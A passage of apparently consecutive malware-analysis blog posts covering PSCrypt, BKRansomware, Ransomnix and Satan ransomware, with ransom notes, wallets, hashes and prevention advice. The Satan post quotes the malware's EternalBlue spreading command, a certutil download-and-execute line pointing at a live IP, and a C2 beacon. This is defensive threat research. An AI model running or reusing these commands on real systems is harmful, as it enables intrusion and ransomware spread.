<i>☠ YOUR FILES ARE TEMPORARILY UNAVAILABLE<br />YOUR DATA WAS LOCKED!<br />To restore data you need a decoder.<br />To receive a decoder, you must pay for decoding services:<br />Payment is made at the expense of bitcoin to wallet number 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />Service cost is $ 150<br />Payment can be made at the terminal IBox. or select one of the exchange sites on the page - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (example exchange of Privat24 to the BTC), you can also use the services of https://e-btc.com.ua.<br />Additional Information:<br />The program can decrypt one file as proof that it has a decoder. To do this, you need to send an encrypted file weighing no more than 2 mb and your unique identification code by mail: systems32x@gmail.com<br />More detailed payment instructions: https://btcu.biz/main/how_to/buy<br />WARNING!<br />All files are decrypted only after 100% payment<br />You really get a decoder after payment<br />Do not try to uninstall a program or run antivirus tools, which can complicate your work<br />Attempts to self-decrypt files will result in the loss of your data<br />Other users' decoders are not compatible with your data, as the unique encryption key for each user.<br />At the request of users, we provide contact with customers who have already used the services of our service.<br />MUST REQUEST BACK TO CONTACTS FOR CONNECTION:<br />systems32x@gmail.com - basic<br />systems32x@yahoo.com - backup<br />Additional contacts:<br />systems32x@tutanota.com - (if the answer did not arrive after 24 hours)<br />help32xme@usa.com - (if the answer did not arrive after 24 hours)<br />Additional.mail@mail.com - (if the answer did not arrive after 24 hours)</i></blockquote>
</div>
<div>
<br /></div>
<div>
The English version is rather short and to the point:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>ALL DATA IS ENCRYPTED!</i><i><br /></i><i>For decoding, write to the addresses:</i><i>systems32x@gmail.com - Basic </i><i>systems32x@yahoo.com - backup </i><i>Additional contacts: </i><i>systems32x@tutanota.com - (if the answer did not arrive after 24 hours) </i><i>help32xme@usa.com - (if the answer did not arrive after 24 hours) </i><i>Additional.mail@mail.com - (if the response did not arrive after 24 hours) </i></blockquote>
</div>
<div>
<br />
The cost for restoring service is, interestingly enough, expressed in US dollars this time ($150), as opposed to Ukrainian currency in a previous iteration.</div>
<div>
<br /></div>
<div>
However, the images which included IBox instructions (as payment method) have been removed, and while IBox is still suggested as a service, there's also a new website introduced to pay via Bitcoin using E-BTC. </div>
<div>
<br /></div>
<div>
E-BTC is a Ukrainian service which is "the most reliable and simple service for buying and selling Bitcoins and also the best partner for entering and withdrawing funds to the WEX stock exchange."</div>
<div>
<br /></div>
<div>
It also promises full anonymity.</div>
<div>
<br /></div>
<div>
Back to the ransomware. Encrypted files will have the <b>.docs</b> extension appended, for example Jellyfish.jpg becomes<b> Jellyfish.jpg.docs</b>.</div>
<div>
<br /></div>
<div>
<b>Ransom note</b>: .docs document.html<br />
<b>BTC Wallet</b>: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />
<b>Emails</b>: systems32x@gmail.com, systems32x@yahoo.com, systems32x@tutanota.com, help32xme@usa.com, Additional.mail@mail.com<br />
<br />
<b>Extension</b>: .docs<br />
<br />
Fortunately, it appears no payments have been made as of yet: <a href="https://blockchain.info/address/1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9" target="_blank">1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9</a><br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
The last iteration of PSCrypt was observed in 2017, but it appears it has now returned to try and coerce users and organisations to pay the ransomware.<br />
<br />
As usual, follow the prevention tips <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a> to stay safe, but the rule of thumbs are as always:<br />
<br />
<ul>
<li>Do not pay, unless there is imminent danger of life</li>
<li>Create regular backups, and do not forget to test if they work</li>
</ul>
<div>
<br /></div>
<div>
IOCs follow below.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<br />
<script src="https://otx.alienvault.com/pulse/5af03cc976d51929c9dd1ce2.js"></script>
<br /></div>
</div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com1tag:blogger.com,1999:blog-606282676955748155.post-16597791382104782992018-05-05T19:20:00.001+02:002018-05-06T19:54:52.888+02:00Vietnamese ransomware wants you to add credit to a mobile phone<br />
In this quick blog post we'll have a look at BKRansomware, a Vietnamese ransomware that wants you to top up its phone.<br />
<br />
<b><span style="color: orange;">Update</span></b>: 2018-05-06, scroll down for the update, added to the conclusion.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
This ransomware is named "<b>BKRansomware</b>" based on the file name and debug path. Properties:<br />
<ul>
<li><b>MD5</b>: 892da86e60236c5aaf26e5025af02513</li>
<li><b>SHA1</b>: 6f36c02161a83a3683921fc73319474157f4fb92</li>
<li><b>SHA256</b>: c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f</li>
<li><b>Compilation timestamp</b>: 2018-05-03 10:04:35
</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f/analysis/" target="_blank">c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f</a></li>
</ul>
<div>
<br /></div>
<div>
BKRansomware will run via command line and displays the following screen:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xPVw5PzVV_A/Wu3kh0IJMYI/AAAAAAAACDc/yo7vwKDfJ2YQmuFuETf8oc9pfNiox0sgQCLcBGAs/s1600/r2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="342" data-original-width="688" height="198" src="https://1.bp.blogspot.com/-xPVw5PzVV_A/Wu3kh0IJMYI/AAAAAAAACDc/yo7vwKDfJ2YQmuFuETf8oc9pfNiox0sgQCLcBGAs/s400/r2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Ransom message</td></tr>
</tbody></table>
<br />
The ransomware message is very brief, and displays:<br />
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>send 50k viettel to 0963210438 to restore your data</i></blockquote>
<div>
<br /></div>
Viettel is a form of credit for mobile phones, used in Vietnam and neighboring countries. It is part of "Viettel Group" (Tập đoàn Công nghiệp Viễn thông Quân đội in Vietnamese), a mobile network operator in Vietnam. (Wiki <a href="https://en.wikipedia.org/wiki/Viettel" target="_blank">link</a>). </div>
<div>
<br /></div>
<div>
As such, it appears the creators are in desperate need of more credit so they can make calls again :)</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
It only encrypts a small amount of extensions:</div>
<div>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-SzaOJ7ifsiY/Wu3khyYv58I/AAAAAAAACDg/XvwWqnsfZ_METL-iQS6nuARUahlcoiCBwCLcBGAs/s1600/r.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="496" data-original-width="625" height="316" src="https://2.bp.blogspot.com/-SzaOJ7ifsiY/Wu3khyYv58I/AAAAAAAACDg/XvwWqnsfZ_METL-iQS6nuARUahlcoiCBwCLcBGAs/s400/r.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - extensions to encrypt</td></tr>
</tbody></table>
<br />
The list is as follows:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>.txt, .cpp, .docx, .bmp, .doc, .pdf, .jpg, .pptx, .png, .c, .py, .sql</i></blockquote>
<div>
<br /></div>
Encrypted files will have the <b>.hainhc</b> extension appended. Fun note: files aren't actually encrypted, but <b>encoded </b>with ROT23. For example, if you have a text file which says "password", the new content or file will now have "mxpptloa" instead.</div>
<div>
<br /></div>
<div>
Noteworthy is the debug path: </div>
<div>
<br /></div>
<blockquote class="tr_bq">
C:\Users\Gaara\Documents\Visual Studio 2013\Projects\<b>BKRansomware-20180503T093651Z-001</b>\BKRansomware\Release\BKRansomware.pdb</blockquote>
<div>
<br /></div>
<div>
The extension mentioned above, "hainhc" <i>may</i> refer to the following handle or persona on Whitehat VN, a Vietnamese Network security community:<br />
<a href="https://whitehat.vn/members/hainhc.59556/" target="_blank">https://whitehat.vn/members/hainhc.59556/</a></div>
<div>
<br />
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Conclusion</b></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<div>
While BKRansomware is not exactly very sophisticated, it is able to encrypt (or rather encode) files, and is unique in the sense that it asks you to top up a mobile phone.<br />
<br />
<b><span style="color: orange;">Update</span></b>: it appears this is a ransomware supposedly used for <i><b>testing</b> </i>purposes, for both coding and testing VirusTotal detections. However, there seems to be a lot of "testing" going on, including keyloggers. Draw your own conclusions.</div>
<div>
<br /></div>
<div>
Follow the prevention tips <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here </a>to stay safe.<br />
<div>
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5aede8891db77b18cd8f8897.js"></script>
<b><br /></b></div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com4tag:blogger.com,1999:blog-606282676955748155.post-26089705804587008272018-04-28T16:27:00.001+02:002018-04-28T23:28:34.671+02:00Ransomnix ransomware variant encrypts websites<br />
<br />
Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.<br />
<br />
This ransomware was discovered in the second half of 2018, and there's a brief write-up by <a href="https://twitter.com/Amigo_A_" target="_blank">Amigo-A</a> here as well: <a href="https://id-ransomware.blogspot.co.uk/2017/08/ransomnix-ransomware.html" target="_blank">Ransomnix ransomware</a><br />
<br />
In this blog post, we'll discuss a newer variant.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
Several encrypted websites were discovered, which display the following message:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-x6ir-2gcjtM/WuR83NdNCnI/AAAAAAAACCo/4p6v7jIWhGkVL9dGFaUqGawkFaDZogiCwCLcBGAs/s1600/Capture.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="748" data-original-width="1600" height="186" src="https://3.bp.blogspot.com/-x6ir-2gcjtM/WuR83NdNCnI/AAAAAAAACCo/4p6v7jIWhGkVL9dGFaUqGawkFaDZogiCwCLcBGAs/s400/Capture.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Ransom message, part 1</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-O3jjlNCeUVs/WuR9Q5uLWwI/AAAAAAAACCw/cNkDWUNLQ9cGpWjqHY903M70FDyneyunACLcBGAs/s1600/Capture2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="594" data-original-width="1600" height="147" src="https://2.bp.blogspot.com/-O3jjlNCeUVs/WuR9Q5uLWwI/AAAAAAAACCw/cNkDWUNLQ9cGpWjqHY903M70FDyneyunACLcBGAs/s400/Capture2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Ransom message, part 2</td></tr>
</tbody></table>
<br />
The full message is as follows:<br />
<div>
<br /></div>
<div>
<div>
<br /></div>
<blockquote>
<i>JIGSAW RANSOMNIX 2018<br />I WANT TO PLAY A GAME!<br />Now Pay 0.2 BTC<br />OR<br />Payment will increase by<br />0.1<br />BTC each day after<br />00:00:00<br />Your Key Will Be Deleted<br />Your Bill till now 2.4000000000000004 BTC<br />Dear manager, on<br />Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)<br />your database server has been locked, your databases files are encrypted<br />and you have unfortunately "lost" all your data, Encryption was produced using<br />unique public key RSA-2048 generated for this server.<br />To decrypt files you need to obtain the private key.<br />All encrypted files ends with .Crypt<br />Your reference number: 4027<br />To obtain the program for this server, which will decrypt all files,<br />you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).<br />After payment send us your number on our mail crypter@cyberservices.com and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).<br />Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!<br />It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)<br />We don't know who are you, All what we need is some money.<br />Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.<br />You can use one of that bitcoin exchangers for transfering bitcoin.<br />https://localbitcoins.com<br />https://www.kraken.com<br />You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in www.google.com for your country.<br />Please use english language in your letters. If you don't speak english then use https://translate.google.com to translate your letter on english language.<br />You do not have enough time to think each day payment will increase by<br />0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.<br /><br />People use cryptocurrency for bad choices,<br /> but today you will have to use it to pay for your files!<br /> It's your choice!</i></blockquote>
<div>
<br /></div>
<div>
The following JavaScript is responsible for keeping track of the price, and increasing it:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ZwC6yq7czQU/WuR_k0RBWDI/AAAAAAAACC8/toiVAHRMOxQJARnMylUm4IF_aWEnhMmzwCLcBGAs/s1600/function.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="610" data-original-width="1139" height="213" src="https://3.bp.blogspot.com/-ZwC6yq7czQU/WuR_k0RBWDI/AAAAAAAACC8/toiVAHRMOxQJARnMylUm4IF_aWEnhMmzwCLcBGAs/s400/function.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - JS function</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The starting price is set at 0.2 BTC, but will increase every day with 0.1 BTC thanks to two functions: <i>inprice</i> and <i>startTimer</i>.</div>
<div>
The function for calculating the time and date, <i>startTimer</i>, is a copy/paste from the following StackOverflow answer: <a href="https://stackoverflow.com/a/20618517/7553720" target="_blank">The simplest possible JavaScript countdown timer?</a></div>
<div>
<br /></div>
<div>
Note that the <i>start_date</i> variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34, as mentioned in the ransom note.</div>
<div>
<br /></div>
<div>
Ransomware message details:</div>
<div>
<br /></div>
<div>
<div>
<b>BTC Wallet</b>: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o</div>
<div>
<b>Email</b>: crypter@cyberservices.com </div>
<div>
<b>Extension</b>: .Crypt</div>
</div>
<div>
<br /></div>
<div>
Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.<br />
<br />
Unfortunately, it appears several people have already paid for decryption: <a href="https://blockchain.info/address/1VirusnmipsYSA5jMv8NKstL8FkVjNB9o" target="_blank">1VirusnmipsYSA5jMv8NKstL8FkVjNB9o</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Disinfection</span></b></div>
<div>
<br /></div>
<div>
If possible, restore the website from a backup, and consequently <b>patch</b> your website, this means: install all relevant and security patches for your CMS, and plugins where applicable.</div>
<div>
<br /></div>
<div>
Then, change all your passwords. Better be safe than sorry.</div>
<div>
<br /></div>
<div>
It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to <a href="https://id-ransomware.malwarehunterteam.com/" target="_blank">ID Ransomware</a> and <a href="https://www.nomoreransom.org/crypto-sheriff.php?lang=en" target="_blank">NoMoreRansom</a>, to see if decryption is possible, or if a decryptor can be developed.</div>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<br /></div>
<div>
For preventing ransomware that attacks your websites, you can follow my prevention tips <a href="https://bartblaze.blogspot.co.uk/2015/03/c99shell-not-dead.html#prevention" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
General ransomware prevention tips can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<br /></div>
<div>
Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.</div>
<div>
<br /></div>
<div>
<b>Remember</b>: create backups, regularly, and test them as well.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<div>
<script src="https://otx.alienvault.com/pulse/5ae48667004c860b480e79c9.js"></script>
</div>
<div>
<br /></div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-16992554799243171902018-04-22T02:48:00.001+02:002018-08-05T12:46:06.497+02:00Satan ransomware adds EternalBlue exploit<br />
Today, <a href="https://twitter.com/malwrhunterteam" target="_blank">MalwareHunterTeam</a> reached out to me about a possible new variant of Satan ransomware.<br />
<br />
Satan ransomware itself has been around since January 2017 as reported by <a href="https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/" target="_blank">Bleeping Computer</a>.<br />
<br />
In this blog post we'll analyse a new version of the infamous Satan ransomware, which since <b>November 2017</b> has been using the <b>EternalBlue</b> exploit to spread via the network, and consequently encrypt files.<br />
<div>
<br /></div>
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<b><br /></b>
First up is a file inconspicuously named "sts.exe", which may refer to "<b>S</b>a<b>t</b>an <b>s</b>preader".<br />
<br />
<ul>
<li><b>MD5</b>: 12bc52fd9da66db3e63bfb196ceb9be6</li>
<li><b>SHA1</b>: 4508e3442673c149b31e3fffc29cc95f834975bc</li>
<li><b>SHA256</b>: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee</li>
<li><b>Compilation timestamp</b>: 2018-04-14 06:33:08</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee/analysis/" target="_blank">b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee</a></li>
</ul>
<div>
<br /></div>
<div>
The file is packed with PECompact 2, and is therefore only 30KB in filesize. </div>
<div>
<br /></div>
<div>
Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: <a href="https://bartblaze.blogspot.co.uk/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a>, which may be a spin-off from Satan, has used VMProtect.</div>
<div>
<br /></div>
<div>
"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-I5nru5dPajo/WtvG5AHK9SI/AAAAAAAACBY/4QFJ0Ob8AuE3Yeb-KsVwDewgpPHsNO1FgCLcBGAs/s1600/Extr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="270" data-original-width="673" height="160" src="https://4.bp.blogspot.com/-I5nru5dPajo/WtvG5AHK9SI/AAAAAAAACBY/4QFJ0Ob8AuE3Yeb-KsVwDewgpPHsNO1FgCLcBGAs/s400/Extr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - download and extract two new files</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "<b>RookIE/1.0</b>", which seems a rather unique User-Agent.</div>
<div>
<ul>
<li>ms.exe has password: <b>iamsatancryptor</b></li>
<li>client.exe has password: <b>abcdefghijklmn</b></li>
</ul>
<div>
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". </div>
</div>
<div>
<br /></div>
<div>
Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-QTIpi0Ak36s/WtvKckTPPFI/AAAAAAAACBk/cccMQsmUawUH21JIFnTzL1Dl30gDxxctgCLcBGAs/s1600/UAC.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="295" data-original-width="465" height="253" src="https://3.bp.blogspot.com/-QTIpi0Ak36s/WtvKckTPPFI/AAAAAAAACBk/cccMQsmUawUH21JIFnTzL1Dl30gDxxctgCLcBGAs/s400/UAC.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - UAC prompt</td></tr>
</tbody></table>
<br />
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.<br />
<div>
<br /></div>
<div>
Curiously, and thanks to the <b>s2 </b>option, the start dialog will be hidden, but the extraction progress is displayed - this means we <b>need to click through to install the ransomware</b>. Even more curious: the setup is in Chinese.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-8KPzr_fjGGw/WtvLVj4CSSI/AAAAAAAACBs/feGQmfm2qsA0I5aO5xL-WpUsgwvo1KFeACLcBGAs/s1600/Setup.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="380" data-original-width="536" height="282" src="https://3.bp.blogspot.com/-8KPzr_fjGGw/WtvLVj4CSSI/AAAAAAAACBs/feGQmfm2qsA0I5aO5xL-WpUsgwvo1KFeACLcBGAs/s400/Setup.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - End of setup screen</td></tr>
</tbody></table>
<br />
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the <b>EternalBlue</b> exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the <b>C:\ProgramData</b> folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.<br />
<div>
<br /></div>
<div>
The infection of other machines on the network will be achieved with the following command:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp </i></blockquote>
<div>
<br /></div>
<div>
We can then see an attempt to spread the ransomware to other machine in the same network:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-okfkJtKG6FE/WtvOUPjKXhI/AAAAAAAACB4/0npExK5E3voQLaP2MpdZRnhecsObdg2XgCLcBGAs/s1600/smb.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="235" data-original-width="651" height="143" src="https://3.bp.blogspot.com/-okfkJtKG6FE/WtvOUPjKXhI/AAAAAAAACB4/0npExK5E3voQLaP2MpdZRnhecsObdg2XgCLcBGAs/s400/smb.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Spreading attempt over SMB, port 445</td></tr>
</tbody></table>
<br />
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using <b>DoublePulsar</b>, and executes the following command:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe</i></blockquote>
<div>
<br /></div>
<div>
This will be used for planting sts.exe on other machines in the network, and will consequently be executed.</div>
<div>
<br /></div>
<div>
Satan ransomware itself, which is contained in Client.exe, will be dropped to <b>C:\Cryptor.exe</b>.<br />
<br />
This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-wXkLPSZSTfE/WtvSGyBI8xI/AAAAAAAACCE/xK4Y9O6FSQERG0sUx5pU6QY4zWUfyHfggCLcBGAs/s1600/DB.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="392" data-original-width="648" height="241" src="https://3.bp.blogspot.com/-wXkLPSZSTfE/WtvSGyBI8xI/AAAAAAAACCE/xK4Y9O6FSQERG0sUx5pU6QY4zWUfyHfggCLcBGAs/s400/DB.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Database-related processes</td></tr>
</tbody></table>
<br />
What's new in this version of Satan, is that the exclusion list has changed slightly - it will not encrypt files with the following words in its path:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<i>windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user</i></blockquote>
<div>
<br /></div>
<div>
This exclusion list is reminiscent of <a href="https://bartblaze.blogspot.co.uk/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a>. (or vice-versa)</div>
<div>
<br /></div>
<div>
Satan will, after encryption, automatically open the following ransomware note: <b>C:\_How_to_decrypt_files.txt</b>:</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-4DTTJTrLQxw/WtvVlVB4pxI/AAAAAAAACCQ/yE_hY1VQxikyFrtqS12DdbepMAIO-x98gCLcBGAs/s1600/note.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="913" data-original-width="1031" height="353" src="https://1.bp.blogspot.com/-4DTTJTrLQxw/WtvVlVB4pxI/AAAAAAAACCQ/yE_hY1VQxikyFrtqS12DdbepMAIO-x98gCLcBGAs/s400/note.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Ransom note</td></tr>
</tbody></table>
<div>
<br />
<div>
<br /></div>
<div>
The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, <b>satan_pro@mail.ru</b>, and append extensions with <b>.satan</b>. For example:<b> [satan_pro@mail.ru]Desert.jpg.satan</b></div>
<div>
<b><br /></b></div>
<div>
<div>
BTC Wallet: <b>14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo </b></div>
<div>
Email: <b>satan_pro@mail.ru</b></div>
</div>
<div>
Note: <b>_How_to_decrypt_files.txt</b></div>
<div>
<br />
It appears one person has already paid 0.2 BTC:<br />
<a href="https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo">https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo</a><br />
<br /></div>
<div>
Satan will create a unique mutex, <b>SATANAPP</b>, so the ransomware won't run twice. It will also generate a unique hardware ID and sends this to the C2 server:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</i> </blockquote>
<blockquote class="tr_bq">
<i>HTTP/1.1</i> </blockquote>
<blockquote class="tr_bq">
<i>Connection: Keep-Alive</i> </blockquote>
<blockquote class="tr_bq">
<i>User-Agent: Winnet Client</i> </blockquote>
<blockquote class="tr_bq">
<i>Host: 198.55.107.149</i></blockquote>
</div>
<div>
<br />
As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, <b>25005f06e9b45fad836641b19b96f4b3 </b>is another downloader which works similar to what is posted in this blog. It would fetch the following files:<br />
<br />
<div class="enum-container expandable">
<div class="enum">
<ul>
<li>http://122.114.9.220/data/client.exe</li>
<li>http://122.114.9.220/data/ms.exe</li>
<li>http://122.114.9.220/data/winlog.exe</li>
</ul>
</div>
<div class="enum">
<br /></div>
<div class="enum">
According to VirusTotal, the downloader file was uploaded:</div>
</div>
<b>2017-11-20 18:35:17 UTC ( 5 months ago )</b><br />
<br />
For additional reading, read <a href="https://s.tencent.com/research/report/455.html" target="_blank">this</a> excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.<br />
<br />
<br /></div>
<div>
<b><span style="font-size: large;">Disinfection</span></b></div>
<div>
<br /></div>
<div>
You may want to verify if any of the following files or folders exist:</div>
<div>
<br /></div>
<div>
<ul>
<li>C:\sts.exe</li>
